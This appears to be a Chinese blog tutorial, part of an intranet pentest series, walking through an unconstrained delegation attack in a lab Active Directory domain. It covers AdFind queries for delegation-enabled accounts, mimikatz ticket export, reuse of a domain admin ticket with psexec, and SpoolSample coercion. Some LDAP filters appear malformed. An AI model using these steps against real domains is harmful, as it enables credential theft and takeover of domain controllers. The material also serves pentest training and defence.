内网系列-委派攻击之非约束委派攻击

什么是域委派

比如现在有web服务器和文件服务器，当用户A访问web服务器去请求某个资源时web服务器上本身并没有该资源，所以web服务器就会从文件服务器上调用这个资源。

委派攻击分类：

• 非约束委派攻击
• 约束委派攻击
• 资源委派攻击

今天我们主要讲非约束性委派的打法。

复现环境：

域控：windows server2012  192.168.31.2  DC  administrator
域内机器：windows server2012  192.168.31.4   SERVER01  user01

给域用户账号设置委派：setspn -U -A 服务名称/主机名.域名 域账号

使用ADFind可以查找非约束委派机器（域用户权限）：
查询非约束委派的主机：
AdFind.exe -b "DC=test,DC=lab" -f "(&(samAccountType=805306369(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
查询非约束委派的用户：AdFind.exe -b "DC=test,DC=lab" -f "(&(samAccountType=805306368(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

开始实验

使用mimikatz抓取凭据：
sekurlsa::tickets \export
可以发现此时是没有域管理员账号凭据的

我们登入DC，使用域管账号在powershell执行 Enter-PSSession - ComputerName <主机名> 来模拟访问非约束委派的机器

我们再去SERVER01抓取凭据，发现抓到了域管理员的凭据

使用mimikatz(域用户执行)导入凭据，此时我们使用psexec即可拿到域控的权限了。

Spooler + 非约束委派

因为上面复习我们需要域管理员访问我们，所以略显的鸡肋，但是我们结合打印机漏洞就可以强制域控访问我们啦。

工具使用spoolsample

失踪人口回归，太久没发文章了，准备发一个内网系列，喜欢的小伙伴可以投币支持一下，文章内容有不对的欢迎斧正，此文章配套工具评论区可取，均源自官方原版。